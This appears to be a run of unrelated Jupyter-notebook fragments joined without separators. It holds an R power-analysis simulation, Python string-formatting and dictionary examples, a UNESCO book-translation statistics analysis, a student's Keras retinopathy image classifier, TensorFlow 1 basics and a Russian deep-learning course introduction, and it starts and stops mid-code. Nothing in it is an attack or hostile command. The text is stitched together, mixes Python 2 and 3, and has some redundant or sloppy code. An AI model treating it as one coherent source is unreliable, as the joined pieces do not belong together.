cdf$ctl.rate) + declare_estimand(est_ANY_AD_3_0 = cdf$tracker.c.rate - cdf$ctl.rate) + declare_reveal(outcome_variables = c("ANY_AD")) + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.a", condition1 = "0", condition2 = "1", estimand = "est_ANY_AD_1_0") + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.b", condition1 = "0", condition2 = "2", estimand = "est_ANY_AD_2_0") + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.c", condition1 = "0", condition2 = "3", estimand = "est_ANY_AD_3_0") diagnosis <- diagnose_design(design, sims = sims.count, bootstrap_sims = bootstrap.sims.count) diagnosis } interval = 25 power.iterate.df <- iterate.for.power(tracker.block.config.three, diagnosis.method=diagnose.experiment, iteration.interval = interval)[1] "min: 50 max: 500 current: 50" [1] " seconds: 13" [1] "min: 50 max: 500 current: 75" [1] " seconds: 13" [1] "min: 50 max: 500 current: 100" [1] " seconds: 13" [1] "min: 50 max: 500 current: 125" [1] " seconds: 13" [1] "min: 50 max: 500 current: 150" [1] " seconds: 13" [1] "min: 50 max: 500 current: 175" [1] " seconds: 13" [1] "min: 50 max: 500 current: 200" [1] " seconds: 13" [1] "min: 50 max: 500 current: 225" [1] " seconds: 13" [1] "min: 50 max: 500 current: 250" [1] " seconds: 13" [1] "min: 50 max: 500 current: 275" [1] " seconds: 13" [1] "min: 50 max: 500 current: 300" [1] " seconds: 13" [1] "min: 50 max: 500 current: 325" [1] " seconds: 13" [1] "min: 50 max: 500 current: 350" [1] " seconds: 13" [1] "min: 50 max: 500 current: 375" [1] " seconds: 14" [1] "min: 50 max: 500 current: 400" [1] " seconds: 14" [1] "min: 50 max: 500 current: 425" [1] " seconds: 14" [1] "min: 50 max: 500 current: 450" [1] " seconds: 14"[...]Plot Resultsggplot(power.iterate.df, aes(n, power, color=estimator_label)) + ## CHART SUBSTANCE geom_line() + geom_point() + ## LABELS AND COSMETICS geom_hline(yintercept=0.9, size=0.25) + theme_bw(base_size = 12, base_family = "Helvetica") + theme(axis.text.x = element_text(angle=45, hjust = 1)) + scale_y_continuous(breaks = seq(0,1,0.1), limits = c(0,1), labels=scales::percent) + scale_x_continuous(breaks = seq(tracker.block.config.three$n.min, tracker.block.config.three$n.max,interval)) + scale_color_viridis(discrete=TRUE) + xlab("number of volunteers needed to detect 25 pct point differences") + ylab("chance of observing difference") + ggtitle("300 volunteers give us a 90% chance of observing 25 pct point diff")Warning message: “Removed 3 rows containing missing values (geom_path).”Warning message: “Removed 3 rows containing missing values (geom_point).”String Formattingfirst_name='Rose' last_name='Mary' print('Hello! I am {} {}'.format(first_name,last_name)) print('Hello! I am {0} {1}'.format(first_name,last_name)) print('Hello! I am {0} {1}. {1} is my surname'.format(first_name,last_name)) f_name='Karan' age=40 print(f'My name is {f_name}.I am {age} years old')My name is Karan.I am 40 years oldThis notebook provides a detailed view of data from (UNESCO)[http://www.unesco.org/xtrans/bsstatexp.aspx] regarding the existing translations from books from one language into another. These results are based on data downloaded on 6 october 2014. Downloaded files have been slightly modified in order to be readable using python-pandas package.import pandas as pd import ipy_table as pytbl %pylab inline # from IPython.display import set_matplotlib_formats # set_matplotlib_formats('pdf') data = pd.read_csv('unesco_xtrans_stats.csv', sep='\t', index_col=0) data = data.fillna(0)Global break down of book translationsdata_world = data.sum() pct = 0.01 data_world_pie = data_world[data_world>0] data_world_pie = data_world_pie / data_world_pie.sum() data_world_pie.sort() fracs = data_world_pie[data_world_pie>pct].values.tolist() labels = data_world_pie[data_world_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=-45, colors=cs) # title('Global volume of books translated from each language\n') axis('equal'); # savefig('/home/carlosm/Projects/BeyondTheBook/DH 2015/fig1.svg') data_world['Chinese']/data_world.sum(), data_world['Arabic']/data_world.sum() for l,f in zip(labels, fracs): print '%-15s,%2.4f %%'%(l,f*100) data_world = data.transpose().sum() pct = 0.015 data_world_pie = data_world[data_world>0] data_world_pie = data_world_pie / data_world_pie.sum() data_world_pie.sort() fracs = data_world_pie[data_world_pie>pct].values.tolist() labels = data_world_pie[data_world_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=-45, colors=cs) # title('Global volume of books translated into each language\n') axis('equal');Translations from EnglishTo begin with, we examine the total number of books originally written in English and which have been translated into another language. The table below indicates also the total number of languages into which English books have been translated.data_en = data['English'] total_en = '{:,.0f}'.format(data_en.sum()) langs_en = '{:,.0f}'.format(len(data_en[data_en>0])) table = []; table.append(['English' , '' ]) table.append(['Total files', total_en ]) table.append(['Translated to languages' , langs_en]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart illustrates the percentage of books translated from English into other languages. Notice that languages which accout for less than 2.5% of the total translations have been aggregated together as 'others'.pct = 0.025 data_en_pie = data_en[data_en>0] data_en_pie = data_en_pie / data_en_pie.sum() data_en_pie.sort() fracs = data_en_pie[data_en_pie>pct].values.tolist() labels = data_en_pie[data_en_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=270, colors=cs) title('Languages English books\nare translated to\n') axis('equal');Translations into EnglishConversely, we examine the number of books which get transltated from other languages into English. The following table indicates the total number of translations into English and from how many languages these translations occurr.data_2_en = data.transpose()['English'] total_2_en = '{:,.0f}'.format(data_2_en.sum()) langs_2_en = '{:,.0f}'.format(len(data_2_en[data_2_en>0])) table = []; table.append(['English' , '' ]) table.append(['Total files', total_2_en ]) table.append(['Translated from languages' , langs_2_en]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart indicates the percentage of translations from other languages into English. Notice that Dutch features in the top 10 languages translated into English.pct = 0.015 data_en_pie = data_2_en[data_2_en>0] data_en_pie = data_en_pie / data_en_pie.sum() data_en_pie.sort() fracs = data_en_pie[data_en_pie>pct].values.tolist() labels = data_en_pie[data_en_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=180, colors=cs) title('Languages from which books\nare translated into English\n') axis('equal');Translations from DutchNext, we examine the total number of books originally written in Dutch and which have been translated into another language. The table below indicates also the total number of languages into which Dutch books have been translated.data_nl = data['Dutch'] total_nl = '{:,.0f}'.format(data_nl.sum()) langs_nl = '{:,.0f}'.format(len(data_nl[data_nl>0])) table = []; table.append(['Dutch' , '' ]) table.append(['Total files', total_nl ]) table.append(['Translated to languages' , langs_nl]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart illustrates the percentage of books translated from Dutch into other languages. Notice that languages which accout for less than 1.5% of the total translations have been aggregated together as 'others'.pct = 0.015 data_nl_pie = data_nl[data_nl>0] data_nl_pie = data_nl_pie / data_nl_pie.sum() data_nl_pie.sort() fracs = data_nl_pie[data_nl_pie>pct].values.tolist() labels = data_nl_pie[data_nl_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=270, colors=cs) title('Languages Dutch books\nare translated to\n') # title('Translated from Dutch\n') axis('equal'); # savefig('/home/carlosm/Projects/BeyondTheBook/DH 2015/fig2.svg');Translations into DutchConversely, we examine the number of books which get transltated from other languages into Dutch. The following table indicates the total number of translations into Dutch and from how many languages these translations occurr.data_2_nl = data.transpose()['Dutch'] total_2_nl = '{:,.0f}'.format(data_2_nl.sum()) langs_2_nl = '{:,.0f}'.format(len(data_2_nl[data_2_nl>0])) table = []; table.append(['Dutch' , '' ]) table.append(['Total files', total_2_nl ]) table.append(['Translated from languages' , langs_2_nl ]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart illustrates the percentage of translations from other languages into Dutch. Notice that English represents by far the majority of books which get translated into Dutch.pct = 0.005 data_nl_pie = data_2_nl[data_2_nl>0] data_nl_pie = data_nl_pie / data_nl_pie.sum() data_nl_pie.sort() fracs = data_nl_pie[data_nl_pie>pct].values.tolist() labels = data_nl_pie[data_nl_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=180, colors=cs) title('Languages from which books\nare translated into Dutch\n') axis('equal'); # savefig('/home/carlosm/Projects/BeyondTheBook/DH 2015/fig2b.svg')Between English and DutchAnd the following table indicates the number of books which have been published from English to Dutch and conversely from Dutch to English.nl_en = '{:,.0f}'.format(data['Dutch']['English']) en_nl = '{:,.0f}'.format(data['English']['Dutch']) table = []; table.append(['' , '' , 'To', '']) table.append(['' , '' , 'English', 'Dutch' ]) table.append(['From', 'English', '' , en_nl ]) table.append(['' , 'Dutch' , nl_en , '' ]) pytbl.make_table(table) pytbl.set_cell_style(2,0, row_span=2, bold=True, color='gray') pytbl.set_cell_style(0,2, column_span=2, bold=True, color='gray') pytbl.set_cell_style(1,2, color='lightgray') pytbl.set_cell_style(1,3, color='lightgray') pytbl.set_cell_style(2,1, color='lightgray') pytbl.set_cell_style(3,1, color='lightgray') data_t = pd.read_csv('unesco_xtrans_stats_years.csv', sep='\t', index_col=0) data_t = data_t.fillna(0)Publications over timeThe following graph indicates the number of books translated per year in Dutch and in English. Notice that because the volumes of books are significantly different, data has been plotted with two different axes.ax = data_t['English'].plot(color='b', label='English') legend(loc='upper left') ax.set_ylabel('# books') ax.set_xlabel('Year of publication') twinx() ax = data_t['Dutch'].plot(color='r', label='Dutch') legend(loc='upper right') ax.set_ylabel('# books') title('English and Dutch books\npublished per year'); data_tt = pd.read_csv('unesco_xtrans_stats_trans_years.csv', sep='\t', skiprows=1) data_tt['Target Language'] = data_tt['Target Language'].fillna('') del data_tt['Unnamed: 36'] data_tt['langs'] = data_tt.apply(lambda x: x['Original language'] + ' - ' + x['Target Language'], axis=1) del data_tt['Original language'] del data_tt['Target Language'] data_tt = data_tt.fillna(0) data_tt = data_tt.set_index('langs') data_tt = data_tt.transpose()Translations over timeThe following graph indicates the number of books which have been translated from Dutch to English and from English to Dutch over the years. Again, notice that the plot has been drawn with two axes.ax = data_tt['English - Dutch'].plot(color='b', label='EN -> NL') legend(loc='upper left') ax.set_ylabel('# books') ax.set_xlabel('Year of publication') twinx() ax = data_tt['Dutch - English'].plot(color='r', label='NL -> EN') legend() ax.set_ylabel('# books') legend(loc='upper right') title('English - Dutch book \ntranslations per year');The following graphs illustrate the volume of books that have been translated over the years into and from English / Dutch.from_lang = 'English' to_lang = 'Dutch' cols = [ col for col in data_tt.columns if col.startswith(from_lang + ' - ')] data_tt[cols].transpose().sum().plot(label='EN -> *') data_tt[from_lang + ' - ' + to_lang].plot(label='EN -> NL') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from English \ninto other languages'); from_lang = 'Dutch' to_lang = 'English' cols = [ col for col in data_tt.columns if col.startswith(from_lang + ' - ')] data_tt[cols].transpose().sum().plot(label='NL -> *') data_tt[from_lang + ' - ' + to_lang].plot(label='NL -> EN') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from Dutch \ninto other languages'); from_lang = 'Dutch' to_lang = 'English' cols = [ col for col in data_tt.columns if col.endswith(' - ' + to_lang)] data_tt[cols].transpose().sum().plot(label='* -> EN') data_tt[from_lang + ' - ' + to_lang].plot(label='NL -> EN') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from other languages \ninto English'); from_lang = 'English' to_lang = 'Dutch' cols = [ col for col in data_tt.columns if col.endswith(' - ' + to_lang)] data_tt[cols].transpose().sum().plot(label='* -> NL') data_tt[from_lang + ' - ' + to_lang].plot(label='EN -> NL') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from other languages \ninto Dutch'); data_t[data_t.index<2008].sum(axis=1).plot() xlabel('Year of publication') ylabel('Global book translations') ax = axis() axis([ ax[0], ax[1], 0, ax[3] ]) # title('Global translations over time'); savefig('GlobalTranslations.pdf')Week 4. Case 2Last edited: 25.2.2018Cognitive Systems for Health Technology ApplicationsHelsinki Metropolia University of Applied Sciences 1. ObjectivesThe aim of this Case 2 is to learn use convolutional neural networks to classify medical images. I downloaded datafile full of diabetic retinopathy images, thousands and thousands of images. Three different folders for training, testing and validation. Two different types of images nonsymptons and symptons. First I import all libraries that I need, then I built neural network and process data and so on. All that found below from this notebook file. Note (25.2)Okay now I take little risk here, I'm not happy with the last result that I get from training last time, result was only 0,73. I did little changes and now I run all, one more time. It is 6:32pm right now and deadline is under 3 hours from now. So let see what happens and how much time this takes. - Kimmo 2. Import libraries# Code, model and history filenames my_code = 'gpu_template.py' model_filename = 'case_2_model.h5' history_filename = 'case_2_history.p' # Info for the operator import time print('----------------------------------------------------------------------') print(' ') print('Starting the code (', time.asctime(), '):', my_code) print(' ') import numpy as np import matplotlib.pyplot as plt import keras from keras import layers from keras import models import pickle from keras.preprocessing.image import ImageDataGenerator from keras import optimizers import os %matplotlib inline3. Building network This chapter is the place where building model happens. I determined batch sizes and number of epoches allready here for data processing, which is later in this code. Adding layers happens here too. I tried VGG16 here, but that gave only 0,70 accuracy for testing the data, so I decided drop that out.# Training parameters batch_size = 40 epochs = 20 steps_per_epoch = 20 validation_steps = 20 image_height = 150 image_width = 150 # Build the model model = models.Sequential() model.add(layers.Conv2D(64, (3, 3), activation = 'relu', input_shape = (image_height, image_width, 3))) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation = 'relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation = 'relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Flatten()) model.add(layers.Dense(138, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4), metrics=['acc'])4. Data preprocessing# Dataset directories and labels files train_dir = "..\\..\\dataset2\\train" validation_dir = "..\\..\\dataset2\\validation" test_dir = "..\\..\\dataset2\\test" # All images will be rescaled by 1./255 train_datagen = ImageDataGenerator(rescale=1./255) test_datagen = ImageDataGenerator(rescale=1./255) train_generator = train_datagen.flow_from_directory( # This is the target directory train_dir, # All images will be resized to 150x150 target_size=(150, 150), batch_size=20, # Since we use binary_crossentropy loss, we need binary labels class_mode='binary') validation_generator = test_datagen.flow_from_directory( validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary') # Create datagenerators for training, validation and testing train_datagen = ImageDataGenerator(rescale = 1./255, zoom_range = 0.2, horizontal_flip = True) validation_datagen = ImageDataGenerator(rescale = 1./255) test_datagen = ImageDataGenerator(rescale = 1./255) # shapes for data_batch, labels_batch in train_generator: print('data batch shape:', data_batch.shape) print('labels batch shape:', labels_batch.shape) break # Generator for validation dataset print('Validation dataset.') validation_generator = validation_datagen.flow_from_directory( validation_dir, target_size = (image_height, image_width), batch_size = batch_size, class_mode = 'binary') labels_batch5. Modeling# Compile the model model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(), metrics=['acc']) # This makes file to my folder from next training model.save('case_2_run_1.h5') # Model training and show time, how much time it takes...and some times it takes a lot... t1 = time.time() h = model.fit_generator( train_generator, steps_per_epoch = steps_per_epoch, verbose = 1, epochs = epochs, validation_data = validation_generator, validation_steps = validation_steps) t2 = time.time() # Store the elapsed time into history h.history.update({'time_elapsed': t2 - t1}) print(' ') print('Total elapsed time for training: {:.3f} minutes'.format((t2-t1)/60)) print(' ') test_generator = test_datagen.flow_from_directory( test_dir, target_size=(150, 150), batch_size=20, class_mode='binary') test_loss, test_acc = model.evaluate_generator(test_generator, steps = 21) # Test accuracy print('test_acc:', test_acc)Found 413 images belonging to 2 classes. test_acc: 0.7917675524596. Results I trained that model many times and I did not get over 0,80 overall. I switch number of epoches, batch sizes, size of pictures, layer sizes and many other things. Some times training took over hour in my laptop. One time even my laptop crashed from overheating, maybe from that or from something else, but right after training completed I put laptop aside from table and it crashed. I trained these results at sunday evening and I decided to leave it here. I did little additions to results when I went trought some powerpoints from Oma, copied them and added them this notebook. Compiled explanations can be found below at "Conclusions" section.import matplotlib.pyplot as plt acc = h.history['acc'] val_acc = h.history['val_acc'] loss = h.history['loss'] val_loss = h.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # Predict the Score y_true = np.zeros(413) y_score = np.zeros(413) sample_count = 413 i = 0 for inputs_batch, labels_batch in test_generator: predicts_batch = model.predict(inputs_batch) L = labels_batch.shape[0] index = range(i, i + L) y_true[index] = labels_batch.ravel() y_score[index] = predicts_batch.ravel() i = i + L if i >= sample_count: break from sklearn.metrics import roc_curve, roc_auc_score fpr, tpr, thresholds = roc_curve(y_true, y_score) auc = roc_auc_score(y_true, y_score) plt.figure() plt.plot(fpr, tpr) plt.plot([0, 1], [0, 1], '--') plt.grid() plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title('ROC curve AUC = {:.3f}'.format(auc)) plt.show() plt.figure() plt.plot(thresholds, 1-fpr, label = 'specificity') plt.plot(thresholds, tpr, label = 'sensitivity') plt.legend() plt.grid() plt.xlabel('Threshold value') plt.show() # Import more libraries from sklearn. from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix from sklearn.metrics import classification_report, recall_score from sklearn.metrics import precision_recall_curve from sklearn.metrics import average_precision_score # Select the threshold to maximize both specificity and sensitivity th = 0.3 acc = accuracy_score(y_true, y_score > th) prec = precision_score(y_true, y_score > th) f1 = f1_score(y_true, y_score > th) recall = recall_score(y_true, y_score > th) print('Accuracy: {:.3f}'.format(acc)) print('Precision: {:.3f}'.format(prec)) print('Recall: {:.3f}'.format(recall)) print('F1: {:.3f}'.format(f1)) print('Classification report') print(classification_report(y_true, y_score > th, labels = [1.0, 0.0], target_names = ['Disease', 'Healthy'])) tn, fp, fn, tp = confusion_matrix(y_true, y_score > th).ravel() print(' Confusion matrix') print(' True condition') print(' Positive Negative Sum') print('Predicted | Positive {:8} {:8} {:8}'.format(tp, fp, tp + fp)) print('condition | Negative {:8} {:8} {:8}'.format(fn, tn, fn + tn)) print(' Sum {:8} {:8} {:8}'.format(tp + fn, fp + tn, tp + fp + fn + tn)) print(' ') print('Sensitivity: {:.3f}'.format(tp/(tp+fn))) print('Specificity: {:.3f}'.format(tn/(tn+fp)))Confusion matrix True condition Positive Negative Sum Predicted | Positive 109 107 216 condition | Negative 10 187 197 Sum 119 294 413 Sensitivity: 0.916 Specificity: 0.636Looping Through DictionariesDictionaries are so important in Python you _need_ to know how to loop over them. But they aren't regular sequences, they don't have an index number. Instead of an index number they use names, and we won't always know the names in a dictionary. So looping is a bit different for dictionaries than it is for lists, tuples, sets or strings.person = { 'name': 'Kalob', 'course': 'Python for Everybody', 'role': 'Teacher', } person for key in person: value = person[key] print(key, value)name Kalob course Python for Everybody role Teacher> **Note**: A regular `for` loop on a dictionary just prints the keys. That's not super helpful if we want key/value pairs without creating our own variables. Using `.item()`'s to create key/value pairs in a tupleperson.items() for key, value in person.items(): print(f"Key: {key} \t\t Value: {value}")Key: name Value: Kalob Key: course Value: Python for Everybody Key: role Value: TeacherSessionSession is a class for running TensorFlow operations. A session encapsulates the control and state of the TensorFlow runtime.import tensorflow as tf # create a graph a = tf.constant(1) # 1 with tf.Session() as session: print(session.run(a)) # 2 session = tf.Session() print(session.run(a)) session.close() # 3 Interactive session, usefull in shells tf.InteractiveSession() print(a.eval())1 1 1Constantsa = tf.constant([[1, 2, 3], [4, 5, 6]], dtype=tf.float32, name='constant') with tf.Session() as session: print(session.run(a)) print("shape: ", a.get_shape(), ",type: ", type(a.get_shape()))[[ 1. 2. 3.] [ 4. 5. 6.]] shape: (2, 3) ,type: Variablesvar = tf.Variable(tf.random_normal([3], stddev=0.1), name='var') with tf.Session() as session: # must initialize before usage init = tf.variables_initializer([var]) session.run(init) # or initialize all vars init = tf.global_variables_initializer() session.run(init) print(session.run(var))[ 0.03565044 0.0211431 0.07576992]Placeholderx = tf.placeholder(tf.int32) y = tf.placeholder(tf.int32) add = tf.add(x, y) add = x + y with tf.Session() as session: result = session.run(add, feed_dict={x: 1, y: 2}) print("1 + 2 = {0}".format(result))1 + 2 = 31.1 Машинное обучение 1.1.1 Место глубокого обучения и нейронных сетей в ИИСуществует множество разных определений, однако большая часть из них завязана на человеко-машинном взаимодействии, то есть это алгоритмы или методы, которые либо имитируют поведение людей, либо позволяют машине вести себя аналогично людям (то есть проявлять некоторое интеллектуальное-разумное поведение). Область ИИ не ограничивалась исключительно машинным обучением, которое состоит из обучения на примерах. В ИИ входит целый ряд алгоритмов, например многоагентные системы (расшифровка) или базы знаний, в которых люди создают связи между разными понятиями.**Искусственный интеллект (AI/ИИ)** ~= область ИТ/Computer science связанная с моделированием интеллектуальных или творческих видов человеческой деятельности.**Машинное обучение(ML)** - подраздел ИИ связанный с обучением на данных, он не единственный. Например базы знаний или многоагентные системы также относят к разделам ИИ. **Глубокое обучение (Deep Learning, DL)** ~= Многослойная нейросеть (MLP = multi layer perceptron)Однако сейчас мы рассмотрим более узкую область, связанную с МЛ. Модели, которые имеют несколько слоев называются глубокими или нейросетевыми. Хотя если мы возьмем один слой такой модели (например линейный классификатор, он же перцептрон), он перестанет быть глубокой моделью, хотя по факту он и является простейшей нейросетью 1.1.2 Области применения DLВ последнее время именно такого рода модели показываю высокую эффективность в тех областях, в которых влияние человека казалось превалирующим. В частности это человеко-компьютерное зрение (Computer Vision, CV), распознавание естественного языка (NLP, извлечение смысла, машинный перевод) и речи. В рамка курса мы рассмотрим как эта область может применяться на практических задачах и моделях, их решающих. Также мы познакомимся с результатами самых современных исследований по теме. В данном курсе мы подробно рассмотрим технологии DL применяющиеся в этих областях. 1.1.3 Связь DL с наукойПомимо прикладных задач существуют еще и научные исследования, результаты которых до известной степени непредсказуемы. Несльзя исключить что он появятся в областях где технологии DL до сих пор активно не использовались. Поддержка такого рода исследований есть основная задача курса нашего курса. Вариант2: Мы видим что NN уже нашли применение в множестве массовых(типовых) задач которые нас окружают.Однако каждая научная работа индивидуальна, в этом состоит сложность: только автор понимает как обрабатываются данные в его предметной области и как следует оценить результат.Но не всегда ученые особенно из естественных или гуманитарных областей готовы самостоятельно применить ML к объекту своих исследований.Поэтому мы здесь ... 1.2 История глубокого обученияНа изображении вы видите перцептрон - по сути первую нейросеть, которая появилась более полувека назад. Это однослойная нейронная сеть, которая сейчас не отнесли бы к моделям глубокого обучения. Перцептрон состоит из трёх типов элементов, а именно: поступающие от датчиков **сигналы** передаются **ассоциативным элементам**, а затем **реагирующим элементам**. Таким образом, перцептроны позволяют создать набор «ассоциаций» между входными стимулами и необходимой реакцией на выходе. В биологическом плане это соответствует преобразованию, например, зрительной информации в физиологический ответ от двигательных нейронов. Суть модели достаточно простая: на вход подаются данные и каждому присваивается вес, на выходе суммируются, далее применяется (пороговая) функция активации. Грубая аналогия - нейрон человеческого мозга, который работает по такому же принципу. На тот момент это стало прорывом и захватило великие умы. Был построен суперкомпьютер, который занимал несколько помещений.Однако уже через несколько лет было доказано, что перцептрон не может воспроизвести ряд простых функций, например функцию **xor**, продемонстрированую в таблице. После этого открытия интерес к нейросетям резко падал и они находились в забвении. По сути, даже опубликовать статью по данной теме было затруднительно.Одной из важнейших работ связанных с глубоким обучением является эксперимент американских биологов из Гарварда. В 1959 были изучены реакции определенных участков кошачьего мозга на определенные простые визуальные стимулы. Как и большая часть открытий, это выяснилось абсолютно случайно. В мозг кошке был вживлен электрод чтобы определить на какой рисунок будет реакция. Однако стоит вспомнить, что в то время слайды переключались последовательным движением и именно на это движение случилась реакция. Как только менялся слайд и по экрану проходила граница затвора, по сути простая прямая линия, реакция передавалась и записывалась.После ряда экспериментов выяснилось, что существуют клетки, реагирующие на простые формы (линии и углы), на движение и движение в определенном направлении или определенной формы. Слои этих клеток образуют определенного рода иерархию и именно эта идея лежит в основе концепции нейросетевых методов. 1.2.2 Победа нейросети AlexNet на соревновании ImageNet в 2012 1.2.3 ImageNet: Large Scale Visual Recognition Challenge (ILSVRC) 1.3 Области применения DL в настоящее время 1.3.1 РобототехникаБеспилотные автомобили Self-Driving Car и дроныПромышленные и бытовые роботы. 1.3.2 БезопасностьВидеоаналитика, контроль доступа, распознавние лиц, номеров. 1.3.3 Интернет и дополненная реальностьПоиск в том числе семантический. Анализ контента, в том числе визуального. Машинный перевод. Распознавание речи. 1.3.4 Медицина- добавить примеров 1.3.5 Применение DL в научных исследованиях 1.3.7 Причины успехов технологий на основе DL 1.4 Задачи решаемые при помощи машинного обучения 1.4.1 Извлечение закономерностейУченый многократно наблюдает за ходом процесса и делает обобщения.Результатом такой работы является модель описывающая некоторые процессы реального мира.ML - технология которая позволяет выявлять закономерности в данных и обобщать их. Результатом обучения такой модели является набор весов. По сути это набор коэффициентов для некоторого математического выражения.Законы Ньютоны не сформулированны для яблок.Для описания закономерностей в науке используются абстракции: сила, масса ускорение которыми описываются реальные объекты.Данные для ML моделей тоже должны быть подготовлены. Типичная форма такой абстракции вектор чисел.Второй частью процесса обучения является оценка результата. Полученный результат сравнивают с эталонным и если разница велика - корректируют модель. ПримерНужно посчитать количество шагов используя показания акселерометра встроенного в шагомер. Вариант №1Написать программу вида:if x[i] > x[i - k] and y[i] > y[i - k] and ... ....else: ... Вариант №2Обучить модельПри этом можно не занать ничего о природе сигналов. Важно лиш собрать достаточное количество данных и разметить их.Разметка в данном случае будет заключаться в с боре информации о том сколько фактически шагов сделал человек. 1.4.3 Базовые задачи 1.4.3 Виды данных 1.4.4 Оценка результата 1.5 Примеры задач решаемых при помощи методов машинного обученияРассмотрим примеры решения задач классификации и линейной регресии на различных типах данных.Будем использовать библиотеки:* numpy* [skilearn](https://scikit-learn.org/stable/) - 'toy' датасеты, ML алгорытмы * [pandas](https://pandas.pydata.org/) - удобная работа с табличными даннымипознакомимся с инструментами:* **Pytorch** * **Tensorboard** 1.5.1 Загрузка данных# Классификация вин # Используем библиотеку sklearn: https://scikit-learn.org/stable/ import sklearn from sklearn.datasets import load_wine #https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html#sklearn.datasets.load_wine # Загрузка датасета data = load_wine(return_X_y = True) # Так же можно получить данные в Bunch(словарь) или pandas DataFrame features = data[0] # Массив 178x13 178 бутылок у каждой 13 признаков class_labels = data[1] # Массив из 178 элементов каждый элемент это число обозначающее класс к которому относиться данная бутылка : 0,1 2 print("Данные",features.shape) print("Номер класса",class_labels.shape)1.5.2 Визуализация данных# Подключим библиотеку для работы с табличнымии данными: https://pandas.pydata.org/ import pandas as pd data_bunch = load_wine(return_X_y = False) print(data_bunch.keys()) """ Если параметр return_X_y == False Данные в объекте Bunch: https://scikit-learn.org/stable/modules/generated/sklearn.utils.Bunch.html#sklearn.utils.Bunch По сути это словарь. Что бы отобразить данные в виде таблицы преобразуем их в формат pandas.DataFrame """ df = pd.DataFrame(data_bunch.data, columns=data_bunch.feature_names) df.head()Каждая строка в таблице может быть интерпретированна как вектор из 13 элементов. Можно интерпретировать такой вектор как координаты точки в 13 - мерном пространстве. Именно с таким представлением работают большинство алгоритмов машинного обучения. Визуализировать 13-мерное пространство не получиться :(. Но можно визуализировать проекцию данных в 3-х мерное пространство. Для этого воспользуемся инструментом projector из tensorboardhttps://pytorch.org/tutorials/intermediate/tensorboard_tutorial.html# Вспомогательный метод для запуска Tensorboard в Colab # Fix: https://stackoverflow.com/questions/60730544/tensorboard-colab-tensorflow-api-v1-io-gfile-has-no-attribute-get-filesystem import tensorflow as tf import tensorboard as tb tf.io.gfile = tb.compat.tensorflow_stub.io.gfile import os import shutil # Запуск Tensorboard в Colab def reinit_tensorboard(clear_log = True): # Лог-файлы читаются из этого каталога: logs_base_dir = "runs" if clear_log: # Очистка логов #!rm -rfv {logs_base_dir}/* shutil.rmtree(logs_base_dir, ignore_errors = True) os.makedirs(logs_base_dir, exist_ok=True) # Магия Colab %load_ext tensorboard %tensorboard --logdir {logs_base_dir}После загрузки Tensorboard измените значение опции "Color by" на "label 3 colors" что бы объекты принадлежащие к разным классам отображались разными цветами. from torch.utils.tensorboard import SummaryWriterimport numpyreinit_tensorboard()writer = SummaryWriter(comment = "wine")np_f = numpy.array(features)writer.add_embedding(np_f, metadata=class_labels )writer.close() Рассказ про PCA Видно что объекты классов 1 и 2 линейно не разделимы в 2-х измерениях. По этой причине так популярен переход к пространствам большей размерности. Обратите внимание что данные центрированны около нуля - это результат нормализации которой они подверглись в Tensorboard.Нам тоже потребуется нормализовыть данные. 1.5.3 Нормализация данных# Сделаем это средствами pytorch import torch from torch.utils.tensorboard import SummaryWriter #reinit_tensorboard() writer = SummaryWriter(comment = "wine") # Отобразим значения двух параметров значения которых отличаются примерно на порядок f_names = data_bunch.feature_names for i, feature in enumerate(features): writer.add_scalars("Raw_2_par",{ f_names[1]:feature[1], # malic_acid f_names[3]:feature[3], # alcalinity_of_ash } ) # Добавим 